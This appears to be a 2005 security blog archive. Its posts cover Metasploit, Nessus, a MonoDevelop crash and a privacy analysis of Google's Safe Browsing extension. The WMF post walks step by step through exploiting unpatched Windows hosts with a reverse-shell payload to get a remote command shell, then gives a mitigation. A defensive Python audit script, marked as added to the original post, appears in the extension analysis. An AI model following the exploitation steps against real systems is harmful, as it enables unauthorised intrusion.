
December 2005 Archives

December 29, 2005

Exploiting the Windows XP/2003 Picture and Fax Viewer Metafile Overflow Vulnerability

HD Moore has released a module for the Metasploit Framework targeting the "Windows XP/2003 Picture and Fax Viewer Metafile Overflow" vulnerability. Here is how easy it is to exploit this now:

1) Download the latest Metasploit 2.x Snapshot
2) Run ./msfweb
3) Point your web browser to http://127.0.0.1:55555
4) Click on "Windows XP/2003 Picture and Fax Viewer Metafile Overflow"
5) Click on "Automatic - Windows XP / Windows 2003 (default)"
6) Select a payload. For example, "win32_reverse". Make sure you have your firewall turned off, or have a rule allowing incoming connections to port 8080 (or whatever port you choose)
7) Click on "-Exploit-"
8) From an un-patched (this is easy as of today, since there is no official patch for this vulnerability) Windows XP or 2003 host, use Internet Explorer to browse to http://[ip]:8080/anything.wmf where [ip] is set to the IP address of the host running Metasploit.
9) Your Metasploit browser session should now output details:

10) Click on the "Session [number]" link, and you now have shell access to the Windows host! Type in the DOS command of your choice, for example "ipconfig" in the screenshot below:

Let's hope there is an official patch released soon! Meanwhile, disable actions on the .wmf extension. Here are instructions on how to do this from the advisory: on the Start menu, choose Run, type "regsvr32 -u %windir%\system32\shimgvw.dll", and then click OK.

December 28, 2005

monodevelop via fink

Has anyone gotten monodevelop to work via fink? For me, it's been broken for months now. I've been ignoring the hi-color theme warnings; I doubt that's what's causing the SIGSEGV. Let me know if you know of a solution.

$ monodevelop

(MonoDevelop:3121): Gtk-WARNING **: Could not find the icon 'gnome-fs-regular'. The 'hicolor' theme
was not found either, perhaps you need to install it.
You can get a copy from:
http://freedesktop.org/Software/icon-theme/releases
10769 [25977856] INFO MonoDevelop.Core.ILoggingService (null) - Initializing service: MonoDevelop.Core.PropertyService
10866 [25977856] INFO MonoDevelop.Core.ILoggingService (null) - Initializing service: MonoDevelop.Core.FileUtilityService
11264 [25977856] INFO MonoDevelop.Core.ILoggingService (null) - Initializing service: MonoDevelop.Documentation.MonodocService

=================================================================
Got a SIGSEGV while executing native code. This usually indicates
a fatal error in the mono runtime or one of the native libraries
used by your application.
=================================================================

Stacktrace:

in <0xffffffff> (wrapper managed-to-native) Gtk.Dialog:gtk_dialog_run (intptr)
in <0x84> (wrapper managed-to-native) Gtk.Dialog:gtk_dialog_run (intptr)
in <0x38> Gtk.Dialog:Run ()
in <0x34> MonoDevelop.Core.Gui.Dialogs.ErrorDialog:Run ()
in <0x964> MonoDevelop.Ide.Gui.IdeStartup:Run (string[])
in <0x228> MonoDevelop.Core.AddIns.AddInService:StartApplication (string,string[])
in <0x38> MonoDevelop.Startup.SharpDevelopMain:Main (string[])
in <0x68> (wrapper runtime-invoke) System.Object:runtime_invoke_int_string[] (object,intptr,intptr,intptr)

December 25, 2005

Can Apple do Better than Objective-C?

Update: After giving some thought to one of the responses on my O'Reilly blog, I have decided to take down the email thread between Jobs and myself. I have no way of knowing if Jobs would be OK with me posting the e-mail publicly, even though the contents of the e-mail didn't contain anything private or sensitive.

That said, I'd like to turn this entry into a discussion of what people think of having to use Objective C to code Cocoa applications. Feel free to comment on my O'Reilly blog. Here is my take on the subject: "Although I am a die-hard Apple and OSX fan, I've never cared for Objective-C much. As far as the development world is concerned, it is my opinion that Microsoft has done wonderful things with .NET, while Apple hasn't churned out much innovation (not recently at least.) I'd like to see Apple developers gain more choice. With every iteration of OSX, there seems to be so much effort put into innovation of desktop components, but the development environment is age old. I use Objective C because I have to, while I use recent languages such as C# and ruby because I want to. Take a look at what Microsoft is doing with .NET: you can write your own .NET compiler - you just have to make sure it spits out the required IL code. It's beautiful and elegant, and you aren't locked onto one language. It's managed, and therefore a bit more expensive, but unless you are writing real time code, it doesn't matter today: it's not _that_ slow for writing most desktop applications. In short, I'd love to see Apple investigate managed code, and perhaps help bind Cocoa with more interesting and fun languages."

[Again, for comments, please visit my O'Reilly blog]
Update2 (12/27/2005): Thanks to those who commented below - most of the comments have been quite constructive and I've enjoyed reading them. I'd like to add the following notes to supplement my views:

1) I am not suggesting Apple carbon copy .NET and port it to OSX as is. I am suggesting that Apple put in some resources to investigate the innovations and choices (C#, Python, etc. can be used to spit out .NET assemblies. It is possible to write a compiler for .NET as long as it adheres to the IL specification - this is what I mean by more choice) offered by .NET and similarly offer its developers more choice. I am suggesting that Apple take a _lead_ with offering its developers new paradigms of creating applications. Feel free to comment on your like or dislike for .NET and compare C# to Objective-C if you must, but you'd have lost the gist of my argument.

2) I do not agree that .NET is 'too slow' or only useful for developing quick and dirty solutions. I have come across a _lot_ of good enterprise level implementations of applications coded in .NET. Please don't attempt to convince me that .NET doesn't work for enterprise level applications - I have seen otherwise.

3) I do not agree with the "If it's not broke, don't fix it" argument. This is an extremely dangerous argument. It limits progress and innovation. For example, Panther was a great iteration of OSX - why did Apple have to work towards Tiger? If one were to accept the "don't fix it" argument, Apple shouldn't have released Tiger, and Apple doesn't need to release any more iterations of OSX. Everything seems 'not broke' with Tiger today, why bother? The answer: innovation. There has got to be a non-stop iteration of improvements. Apple hasn't disappointed me with progress made towards OSX desktop components, and so I'd be happy to see a stronger push towards more choices and newer methods of development.

4) I do not agree with assertions along the lines of "Objective-C is the best. There is nothing better." Language preference is a matter of _taste_, and this cannot be forced upon anyone. _You_ may like the Objective-C way of doing things, but _I_ prefer newer languages such as ruby and C#. I am suggesting Apple investigate and put in efforts towards giving people more choice. There is no doubt in my mind that more developers will be enticed into developing for the OSX platform if they had more choice. Also see 7)

5) I am not suggesting Apple abandon Objective-C. Clearly, it has a tremendous fan following.

6) I am aware, and I appreciate many community related efforts towards bridging Cocoa with other languages. However, many of these are incomplete, and I'd be delighted if Apple chose to sponsor similar efforts.

7) As with .NET in 1), my example of ruby is just that - an example. I am not insisting that Apple only bind languages such as ruby and C# to Cocoa because I happen to like them. I am suggesting that Apple take a look at how these languages are improving the lives of developers. For all I care, Apple could come up with a brand new language after drawing inspiration from recent innovations of ruby and the like.

8) I am not suggesting that Apple has made no progress in the past few months. For example, I am aware of new solutions such as Core Data and Core Image to name a few.

To sum it up: Apple has blown me away with its innovation with desktop components. For example, after having used Expose with hot-corners, I can't imagine life without it. I'd like Apple to channel some energy towards giving its developers more choice of languages, and perhaps learn a thing or two from efforts such as the .NET environment and the ruby language.

Perhaps I should've posted the above with my original post, but I had no idea I was going to get Slashdotted. I've enjoyed most of the comments - but the number of responses has been quite overwhelming. Much appreciated though!

December 22, 2005

Systm Episode 5: Asterisk

Episode 5 of Systm is based on the Asterisk project (open source PBX software). They also mention Hitachi's wireless IP phone. Very informative and highly recommended!

The Cafe Question

For 3 years, I had the opportunity to work from home. I would travel to client locations as needed, and enjoyed the freedoms of a true and ideal consulting lifestyle. During this time, I felt I was most creative, for I had the energy to author two books, articles, and speak at information security conferences around the world. During that time, I felt I was a member of the 'cafe environment' Mark Morford describes in his article "Why Do You Work So Hard?":

Call it "the cafe question." Any given weekday you can stroll by any given coffee shop in the city and see dozens of people milling about, casually sipping and eating and reading and it's freakin' noon on a Tuesday and you're like, wait, don't these people work? Don't they have jobs? They can't all be students and trust-fund babies and cocktail waitresses and drummers in struggling rock bands who live at home with their moms.

Of course, they're not. Not all of them, anyway. Some are creative types. Some are corporate rejects. Some are recovering cube slaves now dedicated full time to working on their paintings. Some are world travelers who left their well-paying gigs months ago to cruise around Vietnam on a motorcycle before returning to start an import-export business in rare hookahs. And we look at them and go, What is wrong with these people?

It's a bitter duality: We scowl at those who decide to chuck it all and who choose to explore something radical and new and independent, something more attuned with their passions, even as we secretly envy them and even as our inner voices scream and applaud and throw confetti.

Our culture allows almost no room for creative breaks. There is little tolerance for seeking out a different kind of "work" that doesn't somehow involve cubicles and widening butts and sour middle managers monitoring your e-mail and checking your Web site logs to see if you've wasted a precious 37 seconds of company time browsing [censored]...

These days, however, I am stuck with a routine 9 to 5 lifestyle. Add to that office politics, _ridiculous_ controls and procedures, the daily work commute routine - and I am left with no energy or will to embark on anything creative. It does appear that the routine corporate environment does not suit me well, and I will have to negotiate some changes soon in order to return to my older lifestyle.

If you haven't had a chance to read Mark's article, I do recommend it highly. I will end this entry with the following quote from the column:

We are designed, weaned, trained from Day 1 to be productive members of society. And we are heavily guilted into believing that must involve some sort of droning repetitive pod-like dress-coded work for a larger corporate cause, a consumerist mechanism, a nice happy conglomerate.

December 16, 2005

Version 3.0 (alpha) of the Metasploit Framework Now Available

The Metasploit team has just released version 3.0 (warning: alpha) of their framework. This release is a complete rewrite of the 2.0 version, and it is written in ruby! For OSX, you will need the ruby and ruby-ssl packages (via fink). Currently, only the Linux and OSX platforms are supported. More details available at http://metasploit.com/projects/Framework/msf3/.

December 15, 2005

Two Things That Bother Me About Google’s New Firefox Extension

Google just released a new Firefox extension called “Safe Browsing for Firefox”. From the "Introduction" section of the plug-in website, here is what it does:

"Google Safe Browsing is an extension to Firefox that alerts you if a web page that you visit appears to be asking for your personal or financial information under false pretences. This type of attack, known as phishing or spoofing, is becoming more sophisticated, widespread and dangerous. That's why it's important to browse safely with Google Safe Browsing. By combining advanced algorithms with reports about misleading pages from a number of sources, Safe Browsing is often able to automatically warn you when you encounter a page that's trying to trick you into disclosing personal information."

Good enough. I clicked on the FAQ section of the web-site to learn how the extension works, and here is the explanation given:


"6. How does Google know a page is bogus?
We use several techniques to determine whether a page is genuine, including the use of a blacklist containing pages that have been identified as suspicious and/or misleading based on automated detection or user reports. Our software also examines pages' content and structure in order to catch potentially misleading pages. Google Safe Browsing can't offer perfect protection, so you should always be on the lookout for indications that a site isn't what it appears to be. But Google Safe Browsing can help identify and protect you against many of the sites designed to trick users."

Great – but what information does the extension send to Google? To find out, I intercepted the traffic between my Firefox browser and google.com. For every request you make, the extension invokes /safebrowsing/lookup on http://www.google.com. So, if you were to go to cnn.com with the extension enabled, here is the HTTP GET request that will be sent to http://www.google.com:


GET /safebrowsing/lookup?sourceid=firefox-antiphish&features=TrustRank&client=navclient-auto-ape&q=http%3A%2F%2Fcnn.com%2F HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: [deleted]

Since http://cnn.com is a legitimate domain name, http://www.google.com/safebrowsing/lookup sends the following back:

HTTP/1.1 200 OK
Content-Type: text/plain
Server: TrustRank Frontend
Content-Length: 0
Date: Thu, 15 Dec 2005 10:16:55 GMT

And all is well. To test what happens when you do come across a 'phishy' website, I logged into my Yahoo! account and looked at one of the billion Paypal phishing emails I get every day, and found the following URL: http://mail.teleline.hu/%20/https:/www.paypal.com/cgi-bin/webscr/update.html . This is obviously a phishing attempt, and sure enough, the Google extension caught it:

The following response was sent back by http://www.google.com/safebrowsing/lookup to the Firefox extension when I visited the above website:


HTTP/1.1 200 OK
Content-Type: text/plain
Server: TrustRank Frontend
Cache-Control: private, x-gzip-ok=""
Date: Thu, 15 Dec 2005 10:04:47 GMT
Content-Length: 11

phishy:1:1

So, in a nutshell, the extension looks for the phishy:1:1 response from http://www.google.com/safebrowsing/lookup and alerts the user.

Here are two things that bother me about this extension:

1) Every request is transmitted to Google over HTTP, i.e. in clear-text. This is not good. Here is why: Consider a web application that uses SSL to encrypt the session. If this web application were to submit private information about you via a GET request (i.e., in the URL, such as a credit card number), this will now be transmitted to http://www.google.com/safebrowsing/lookup in clear-text, allowing someone on your network segment, or any router in between yourself and google.com, to sniff the information off the wire.

2) The extension sends the entire GET request to Google. If a web application were to send private information via GET parameters, this will now be transmitted to Google.

I am more worried about issue #1. However, I do realize that web applications should be designed to use POST in order to send sensitive information, but the fact of the matter is that many web applications do not follow this guideline. Google's extension makes this situation worse by transmitting this information in clear text (assuming the web application uses SSL). This extension is designed to help protect users from illegitimate resources, but the irony is that it has the potential to expose sensitive information about you when you visit legitimate resources!
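To make the two concerns concrete, here is an added audit script (not part of the original post) that takes proxy-log request lines in the /safebrowsing/lookup format captured above, decodes the q= parameter and flags lookups where an HTTPS page's query string, possibly carrying sensitive parameters, left the browser in clear text; it also parses the plain-text lookup response. The log lines, the bank.example host and the SENSITIVE_PARAMS list are constructed for illustration.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed proxy-log request lines in the format the extension was observed
# to send (sourceid, features, client and q parameters as on the page).
SAMPLE_REQUESTS = [
    "GET /safebrowsing/lookup?sourceid=firefox-antiphish&features=TrustRank"
    "&client=navclient-auto-ape&q=http%3A%2F%2Fcnn.com%2F HTTP/1.1",
    # Constructed: an HTTPS page that (wrongly) carried card data in GET parameters.
    "GET /safebrowsing/lookup?sourceid=firefox-antiphish&features=TrustRank"
    "&client=navclient-auto-ape&q=https%3A%2F%2Fbank.example%2Fpay"
    "%3Fcard%3D4111111111111111%26cvv%3D123 HTTP/1.1",
    "GET /index.html HTTP/1.1",
]

# Assumed list of parameter names worth flagging; tune for your applications.
SENSITIVE_PARAMS = {"card", "cvv", "ssn", "password", "passwd", "pin", "account"}

LOOKUP_RE = re.compile(r"^GET (/safebrowsing/lookup\?[^ ]+) HTTP/1\.[01]$")


def extract_lookup_url(request_line):
    """Return the decoded q= value of a /safebrowsing/lookup request, else None."""
    m = LOOKUP_RE.match(request_line)
    if not m:
        return None
    values = parse_qs(urlparse(m.group(1)).query).get("q")
    return values[0] if values else None


def classify_exposure(url):
    """Describe what a clear-text lookup of `url` reveals to an on-path observer."""
    parsed = urlparse(url)
    params = parse_qs(parsed.query)
    return {
        "host": parsed.hostname,
        "origin_was_tls": parsed.scheme == "https",
        "has_query": bool(parsed.query),
        "sensitive_params": sorted(k for k in params if k.lower() in SENSITIVE_PARAMS),
    }


def audit(lines):
    """Return (host, sensitive_params) for every lookup that leaked an HTTPS query string."""
    findings = []
    for line in lines:
        url = extract_lookup_url(line)
        if url is None:
            continue
        info = classify_exposure(url)
        if info["origin_was_tls"] and info["has_query"]:
            findings.append((info["host"], info["sensitive_params"]))
    return findings


def parse_lookup_response(body):
    """Empty body means no verdict (as for cnn.com); 'phishy:1:1' means flagged."""
    body = body.strip()
    if not body:
        return "clean"
    return "phishy" if body.startswith("phishy:") else "unknown"
```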

So there you have it – my preliminary analysis of Google’s new Firefox extension.

December 12, 2005

Nessus 3.0.0 Released

Tenable has released Nessus 3.0.0. I gave it a whirl, and it does seem to be snappier. Here are the major enhancements in Nessus 3.0.0 (from nessus.org):

New NASL3 engine
Improved plugin storage for faster startup time
Improved networking functions
New scanner architecture to be both efficient and robust
The Nessus daemon fetches the plugins automatically when registered (this can be disabled in nessusd.conf)
Improved error handling

An OSX port is not expected to be available by January 2006. I definitely look forward to that. Click here to download Nessus 3.0.0.

December 6, 2005

Another Reason Why Nessus3 won’t be Released Under the GPL?

Ron Gula, CTO and CEO of Tenable, was interviewed by Federico Biancuzzi over at SecurityFocus. Federico asked Ron why Tenable decided not to release Nessus3 under the GPL license, and here is what he had to say:

"Ron Gula: Customer demand. Organizations want a free product that they can use, and a place they can get commercial support and training from if needed. I'd also like to point out that although Nessus 3 is not released under the GPL, Tenable is still actively maintaining Nessus 2. We just released an update for Nessus 2.2 with lots of improvements.

I thought you chose to develop a closed source tool to have more control on the code, and more opportunities to get profits. Why did your customers ask you to rewrite a closed source version? What type of advantage should they get from a closed source version?

Ron Gula: There [was a] very small benefit to working with one set of code, but the overwhelming reason was to have a better relationship with our user base - a majority of which can't really use GPL code. Of course everyone does, but in this day and age of SOX, FISMA and 'process' a lot of folks are having to replace open source solutions with technology that is supportable and has licenses in line with whatever corporate policy is out there."

I called up Mike Horton, a friend of mine, and asked him about Ron Gula's comments. Mike has been involved with a considerable amount of SOx IT process work over the past few months. I asked him if SOx prohibits the use of open source scanning software, and this was his response: "In short - No. SOx specifies no technology requirements to any such degree. At first I was thinking that Tenable's switch to closed source is based more on efficiency and cost of resources. But they are still actively maintaining version 2 and put out a new version 3 that is still free (no cost). In thinking about his comments in the interview further, another possible and more plausible reason he may be alluding to in relation to SOx is easier 'control' of change management for the company using Nessus for their SOx security testing. Software change management is a major part of the IT portion of SOx being tested by companies out there. Now, my understanding is that most companies are not carrying the need for change management controls for SOx all the way to the tools used for the security testing/auditing. The primary focus of the IT portion of SOx is to review controls in place for the company's financial oriented software applications and the systems directly supporting them. And as I understand, that is what many companies are focusing their efforts on. But, because there are no clear requirements for how SOx compliance should be tested, I can also imagine a fair number of companies are also going down the path of ensuring change controls are in place for the code bases of supporting applications, such as Nessus. In this scenario, if the source of the tool is open, then it 'could' be altered, and so it would need to have change management controls in place to ensure it is only changed when it is supposed to be changed. For these companies, if Tenable were to provide a closed source version for them to use as a part of their security controls for SOx compliance, then they would not have to show proper change management control for the code, which would make life a bit easier for them."

In my previous entry about this issue, I presented Renaud Deraison’s [also of Tenable] comments on why Nessus won’t be GPL’d.

"Virtually nobody has ever contributed anything to improve the scanning _engine_ over the last 6 years. I'm not talking about shoe- horning DB support in nessusd, but really to contribute things which make the scans faster, or Nessus more powerful.

Michel Arboi, a friend of mine, is one exception to that, and Nicolas Pouvesle, a colleague at Tenable, is another exception to that.

A number of companies are _using_ the source code against us, by selling or renting appliances, thus exploiting a loophole in the GPL. So in that regard, we have been fueling our own competition and we want to put an end to that. Nessus3 contains an improved engine, and we don't want our competition to claim to have improved ‘their’ scanner."

Renaud's reasoning on why Nessus3 won't be GPL'd seems a lot more sincere and straightforward. After speaking with Mike Horton, I can see why Tenable may want to release a closed source distribution of Nessus, but I find it odd that Renaud and Gula presented two completely different reasons when asked why Nessus3 won't be under the GPL. Perhaps Gula and Renaud should have a chat, and come up with a consistent answer when queried on this topic - I'm sure Tenable is frequently going to be asked to comment on this issue in the near future.

About December 2005

This page contains all entries posted to Nitesh Dhanjani in December 2005. They are listed from oldest to newest.
